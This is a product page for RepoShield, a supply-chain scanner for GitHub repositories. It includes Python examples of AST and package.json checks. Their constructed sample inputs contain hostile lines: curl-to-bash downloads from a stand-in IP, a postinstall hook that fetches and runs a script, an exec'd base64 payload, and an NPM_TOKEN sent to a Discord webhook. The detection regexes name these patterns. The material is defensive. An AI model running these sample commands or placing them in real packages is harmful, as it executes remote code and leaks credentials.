RepoShield
pre-execution trust · 49 signals · 7 layers

Know a repo is safe
before you npm install.

RepoShield scans GitHub repositories for malicious install scripts, hidden execution vectors, and supply-chain risks — in seconds, with zero setup, before a single line of code runs on your machine.

49 security checks
7 detection layers
<6s avg scan time
0 lines of code executed
01 · flow

How a scan works

Three surfaces. Metadata → source → dependencies. No code executes on your machine or ours during the free tier.

01
metadata

Repo fingerprint

Fetch metadata, contributor graph, release integrity, and CI workflow permissions via the GitHub API. Zero clone, zero code.

02
static analysis

AST + regex sweep

Parse source with @babel/parser and python-ast. Look for eval, child_process, env exfil, base64 payloads, and 30+ more code patterns.

03
supply chain

Dep intelligence

Cross-reference every declared + transitive dep against OSV, GHSA, typosquat index, and maintainer reputation scores.
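What the static-analysis layer (step 02) does, as an added example that is not RepoShield's own code: Python's standard ast module walks a constructed sample module without executing it, flagging eval/exec, shell execution, environment-variable reads and base64 literals that decode to code, while a regex sweep over string literals catches curl|bash, raw IP addresses and Discord/Telegram webhook URLs. The rule IDs reuse the catalog's labels, but the matching logic, the code-marker list and the sample source are assumptions made for this example.

```python
"""Toy static-analysis layer: walk a Python module's AST and flag code patterns
a supply-chain scanner cares about. Illustrative only; rule IDs borrow the
page's labels, the matching logic is this example's own."""
import ast
import base64
import binascii
import re

# Regexes applied to every string literal (the "regex sweep" half).
SHELL_PIPE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b")
RAW_IP = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
WEBHOOK = re.compile(r"discord(?:app)?\.com/api/webhooks/|api\.telegram\.org/bot", re.I)
# Assumed markers: a decoded base64 literal containing any of these is treated as code.
CODE_MARKERS = ("import ", "os.system", "subprocess", "exec(", "eval(", "/bin/sh", "bash")
SHELL_SINKS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.check_output", "subprocess.Popen"}


def dotted_name(node):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, or '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def decoded_code(literal):
    """If `literal` is valid base64 whose plaintext looks like code, return the plaintext."""
    try:
        text = base64.b64decode(literal, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, TypeError, UnicodeDecodeError):
        return None
    return text if any(marker in text for marker in CODE_MARKERS) else None


class PatternVisitor(ast.NodeVisitor):
    def __init__(self):
        self.findings = []  # each finding is (rule_id, line, detail)

    def flag(self, rule, node, detail):
        self.findings.append((rule, node.lineno, detail))

    def visit_Call(self, node):
        name = dotted_name(node.func)
        if name in ("eval", "exec"):
            self.flag("SC-001", node, f"{name}() of runtime-built code")
        if name in SHELL_SINKS:
            # os.system/os.popen always go through a shell; subprocess only with shell=True
            shell = name.startswith("os.") or any(
                kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True
                for kw in node.keywords)
            if shell:
                self.flag("SC-002", node, f"{name} with shell semantics")
        if name in ("os.environ.get", "os.getenv"):
            self.flag("NW-003", node, "environment variable read")
        if name == "base64.b64decode" and node.args and isinstance(node.args[0], ast.Constant):
            plain = decoded_code(node.args[0].value)
            if plain:
                self.flag("SC-004", node, f"base64 literal decodes to {plain!r}")
        self.generic_visit(node)  # keep walking so nested string literals are swept

    def visit_Subscript(self, node):
        if dotted_name(node.value) == "os.environ":
            self.flag("NW-003", node, "environment variable read")
        self.generic_visit(node)

    def visit_Constant(self, node):
        if isinstance(node.value, str):
            if SHELL_PIPE.search(node.value):
                self.flag("EX-002", node, "curl|bash style download-and-run")
            if RAW_IP.search(node.value):
                self.flag("NW-002", node, "raw IP address in string")
            if WEBHOOK.search(node.value):
                self.flag("NW-005", node, "Discord/Telegram webhook endpoint")


def scan(source):
    """Parse `source` and return findings sorted by line; the source is never executed."""
    visitor = PatternVisitor()
    visitor.visit(ast.parse(source))
    return sorted(visitor.findings, key=lambda f: (f[1], f[0]))


# Constructed sample module exercising several rules at once (not from any real package).
ENCODED = base64.b64encode(b"import os; os.system('id')").decode()
SAMPLE_SOURCE = "\n".join([
    "import os, subprocess, base64, urllib.request",
    "",
    "def setup():",
    '    token = os.environ.get("NPM_TOKEN")',
    '    subprocess.run("curl -s http://203.0.113.7/x | bash", shell=True)',
    f'    payload = base64.b64decode("{ENCODED}")',
    "    exec(payload)",
    '    urllib.request.urlopen("https://discord.com/api/webhooks/1/abc", data=token.encode())',
    "",
    "def harmless():",
    "    return sum(range(10))",
])

if __name__ == "__main__":
    for rule, line, detail in scan(SAMPLE_SOURCE):
        print(f"{rule} line {line}: {detail}")
```

The AST checks are cheap and precise about *what* is called, but they say nothing about reachability: a flagged `exec` inside a function nobody calls still scores. The regex half has the opposite problem, e.g. RAW_IP also matches four-part version strings, so a scanner weights these signals rather than treating any one as a verdict.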

02 · catalog

What RepoShield looks for

Four primary attack surfaces on every scan. Each finding is cited to a file + line, weighted, and explained in plain English.

7 checks

Install Script Risks

Pre/postinstall hooks, curl|bash patterns, binary drops.

  • EX-001 Dangerous npm Lifecycle Scripts
  • EX-002 curl | bash Patterns
  • EX-003 Hidden node_modules Commit
  • EX-004 Dockerfile Remote Execution
13 checks

Code Patterns

AST-level signals: eval, child_process, sensitive file reads.

  • SC-001 eval() / Function() Usage
  • SC-002 child_process Shell Execution
  • SC-003 Dynamic require()
  • SC-004 Base64 Payload Detection
7 checks

Dependencies

Known-bad packages, typosquats, fresh deps, transitive risk.

  • DP-001 Known Malicious Package DB
  • DP-002 Typosquatting Detection
  • DP-003 Very New Dependency
  • DP-004 Deep Transitive Dependency Scan
7 checks

Network Indicators

Hardcoded URLs, raw IPs, env exfil, webhook C2 channels.

  • NW-001 Hardcoded URL Extraction
  • NW-002 Raw IP Address Communication
  • NW-003 Environment Variable Exfiltration
  • NW-005 Webhook & Discord/Telegram Bots
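How the install-script and dependency checks above can be applied to a package.json, as an added example that is not RepoShield's own code: it flags the script keys npm runs automatically (EX-001), download-and-run pipelines and raw IPs inside them (EX-002, NW-002), and dependency names one edit away from a popular package (DP-002), then sums per-finding weights into a score. The weights, the stand-in popular-package list and the sample package.json are assumptions made for this example.

```python
"""Toy install-script / dependency triage of a package.json. Rule IDs reuse
the catalog's labels; weights, the popular-package list and the matching
logic are this example's own assumptions."""
import json
import re

# Script keys npm runs on its own. preinstall/install/postinstall fire on every
# `npm install` of the package; prepare fires when installing from git or a local
# checkout rather than a published registry tarball, so it is weighted lower here.
LIFECYCLE_KEYS = {"preinstall": 6, "install": 6, "postinstall": 6, "prepare": 3}
SHELL_PIPE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b")
RAW_IP = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Constructed stand-in for the popular-package index a typosquat check compares against.
POPULAR = {"express", "lodash", "react", "color", "chalk", "axios", "debug", "commander"}


def edit_distance(a, b):
    """Levenshtein distance with a rolling single-row DP table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_package_json(text):
    """Return (findings, score); each finding is (rule_id, weight, where, detail)."""
    pkg = json.loads(text)
    findings = []
    for key, command in pkg.get("scripts", {}).items():
        if key in LIFECYCLE_KEYS:
            findings.append(("EX-001", LIFECYCLE_KEYS[key], f"scripts.{key}", command))
        if SHELL_PIPE.search(command):
            findings.append(("EX-002", 9, f"scripts.{key}", "pipes a remote script into a shell"))
        if RAW_IP.search(command):
            findings.append(("NW-002", 5, f"scripts.{key}", "contacts a raw IP address"))
    for section in ("dependencies", "devDependencies"):
        for name in pkg.get(section, {}):
            if name in POPULAR:
                continue  # the genuine package, not a look-alike
            near = sorted(p for p in POPULAR if edit_distance(name, p) == 1)
            if near:
                findings.append(("DP-002", 8, f"{section}.{name}", f"one edit away from {near}"))
    return findings, sum(weight for _, weight, _, _ in findings)


# Constructed sample manifest (not from any real package).
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "sample-pkg",
    "version": "1.0.0",
    "scripts": {
        "build": "tsc -p .",
        "postinstall": "curl -fsSL http://203.0.113.7/setup.sh | bash",
        "prepare": "node scripts/prepare.js",
        "test": "jest",
    },
    "dependencies": {"lodash": "^4.17.21", "expres": "^4.18.2", "colour": "1.4.0"},
})

if __name__ == "__main__":
    found, total = audit_package_json(SAMPLE_PACKAGE_JSON)
    for rule, weight, where, detail in found:
        print(f"{rule} (+{weight}) {where}: {detail}")
    print("score:", total)
```

Note that a lifecycle hook is not malicious in itself; native-addon packages legitimately build in `install`. The signal is what the hook does, which is why the download-and-run and raw-IP findings carry more weight than the bare presence of the key. The typosquat check is only as good as the popular-package list, and an exact-distance-1 rule misses swaps such as `node-fetch` versus `nodefetch`, so a real index also normalizes separators and case.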
03 · real attacks

Patterns we’ve caught in the wild

Seventy-plus real open-source supply-chain incidents (most of them npm), condensed into detection rules. A few of the classics:

threat

event-stream (2018)

A malicious flatmap-stream dependency added to event-stream@3.3.6 carried a payload targeting the Copay bitcoin wallet.

  • DP-001 known-malicious package
  • SC-004 base64 payload
threat

xz-utils backdoor (2024)

The 5.6.0 and 5.6.1 release tarballs carried a modified build script that was not in the git tree; the backdoor existed only in the distributed archive.

  • RS-006 release vs code mismatch
  • EX-005 binary executables
threat

discord-loot typosquat

Fake 'discord-loot' / 'discord.js-api' posted wallet + token theft to Discord webhooks.

  • DP-002 typosquat
  • NW-005 webhook C2
threat

postinstall curl | bash

Classic: package.json postinstall pipes a remote shell script straight to bash.

  • EX-001 lifecycle script
  • EX-002 curl | bash